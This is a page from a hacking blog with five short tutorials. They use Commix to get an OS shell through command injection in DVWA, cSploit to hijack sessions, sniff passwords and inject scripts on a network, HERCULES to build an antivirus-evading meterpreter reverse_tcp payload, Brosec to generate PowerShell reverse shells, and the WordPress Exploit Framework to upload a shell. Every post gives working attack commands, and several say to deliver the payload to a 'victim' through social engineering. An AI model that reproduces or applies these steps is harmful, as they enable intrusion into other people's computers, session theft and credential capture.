Exploiting OS Command Injection in Web Application using Commix

at 3:33 AM Sunday, June 12, 2016 0 comments
Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool written by Anastasios Stasinopoulos that can be used from web developers, penetration testers or even security researchers in order to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.

First of all , install tamper data on firefox which is used for modifying  http requests.We will be using DVWA  for the testing purposes. DVWA is installed on the target machine with ip=192.168.0.105.


Login into DVWA and set  the security to low and open the command injection tab


Now, open the tamper data and start tampering  and enter any IP address and submit . Now tamper data will pop up asking for tampering the data ,click on submit  to all the pop-ups.


Now open tamper data and find the cookie value from the GET request  and copy it.


Also copy the POST string from the POST method.


Now open up the terminal on kali Linux and type the following command

commix  --url="http://192.168.0.105/dvwa/vulnerabilities/exec/#" --cookie="security=low; PHPSESSID=nh5ehntedbu7ha97lpm8o8vjm2" --data="ip=192.168.0.105&Submit=Submit"

In URL field paste the  target URL.

In the cookie field paste the cookie value you copied and in data field paste the POST string you copied and put the IP of target machine in the ip field of post string .

After execution of the command you will get the os-shell of the targeted  machine and you can run any windows command as my target machine was windows.

Labels: ,

Hack your Network through Android Phone using cSploit

at 8:28 AM Friday, June 10, 2016 0 comments
First download the CSploit from here and install in your android phone

Now open your cSploit and select your network and select the target IP which you want to hack.


Now select MITM option, see the picture below:


Session Hijacker

Now choose Session Hijacker option (it is used to capture victim's browser activities)


Now click on start button to start the Session Hijacking


Now you will see the result. In my case victim has opened 3 tabs in his browser.


Now if you want to open any particular session then click on the link, it will automatically start the session hijacking. (Example is given below)



Password Sniffer
In this option choose the Password Sniffer tab.
Note: It will capture only http passwords


Here you can see the result.


Kill Connections
Now choose the Kill Connections option. It will disconnect the internet connection in the desired PC in network.


Redirect
Now choose Redirect option


Now you will see a prompt and enter the desired website address which you want to redirect the victim's traffic. (This works only for http websites)


Replace images
In next option choose Replace images (It is used to change the image of the victim's current tab)


Now choose your desired image which you want to display on victim's browser.




Script Injection

Now choose Script Injection option (It will show the fake message of the victim's browser)


Now choose Local File option


Labels: ,

Bypass All Antivirus and Hack Remote Windows 10 PC using Hercules

at 8:55 AM Wednesday, June 8, 2016 0 comments
HERCULES is a special payload generator that can bypass all antivirus software.

First clone Herculesrepository from github, to do so type:


https://github.com/EgeBalci/HERCULES.git


Now Open kali linux terminal in the directory that you have downloaded Hercules and type the following command

./HERCULES_x64 192.168.0.105 4444 –p windows/meterpreter/reverse_tcp –a 64 –l dynamic


Now it will save a file with name payload.exe now send your exe files to victim using any social engineering technique.


Now open kali Linux terminal and type netcat command this will attempt to initiate a TCP to the defined host on the port number specified. 

nc –l –p 4444

Labels: ,

Hack Remote PC with Reverse PowerShell using Brosec

at 7:55 AM Tuesday, June 7, 2016 0 comments
Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec's most popular use cases is the ability to generate on the fly reverse shells (python, perl, powershell, etc) that get copied to the clipboard.

Firstly install the Brosec tool in your Kali Linux. Follow the below steps one by one:
Reference:

https://github.com/gabemarshall/Brosec

·         apt-get install npm build-essential g++ xsel netcat Install dependencies
·         npm config set registry http://registry.npmjs.org/ Npm registry seems to be broken by default when installed from Kali repos
·         npm install -g n Install n (nodejs version manager)
·         n latest Install latest version of nodejs
·         git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo

·         cd Brosec && npm install - cd into the directory and install npm depdendencies


After that start Brosec by typing in terminal:
./bros
It will show you menu options.


Now set the IP of your localhost :
set lhost 192.168.0.111
Now set the lport :
set lport 4444


After setting the localhost and lport, choose option 5 Miscellaneous.

You will see 2 options Reverse Shells and Exfiltration. Now select option1 Reverse Shells, see the image below:


After choosing the option Reverse Shells, you will see 5 options. In my case I'm selecting option 4 Reverse Shell PSH


Now it will show you a message Should I start a netcat listener for you?

Press Y to start the netcat listener. It will generate a powershell script, see the below picture.

And copy this code in text editor and save it with .ps1 (powershell extension)



Now send the saved .ps1 file to the victim using any social engineering method. When the victim clicks on it, you will get the session of the victim's PC. See the picture below for reference.


Now you can use the systeminfo command to get the information of the victim's PC.

Labels: ,

Penetration Testing in Wordpress Website using Wordpress Exploit Framework

at 5:54 AM Monday, June 6, 2016 0 comments
A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems

first clone WPXF repository from github, to do so type:


https://github.com/rastating/wordpress-exploit-framework.git


now Open kali linux terminal in the directory that you have downloaded WordPress Exploit Framework to, and start it by running ruby wpxf.rb.


Once loaded, you'll be presented with the wpxf prompt, from here you can search for modules using the search command or load a module using the use command.

wpxf > use exploit/refelex_gallery_shell_upload

wpxf [exploit/ refelex_gallery_shell_upload] > set host 192.168.0.104

wpxf [exploit/ refelex_gallery_shell_upload] > set target_uri /

wpxf [exploit/ refelex_gallery_shell_upload] > set payload reverse_tcp

wpxf [exploit/ refelex_gallery_shell_upload] > set lhost 192.168.0.105

wpxf [exploit/ refelex_gallery_shell_upload] > run


Labels: ,
Subscribe to: Comments (Atom)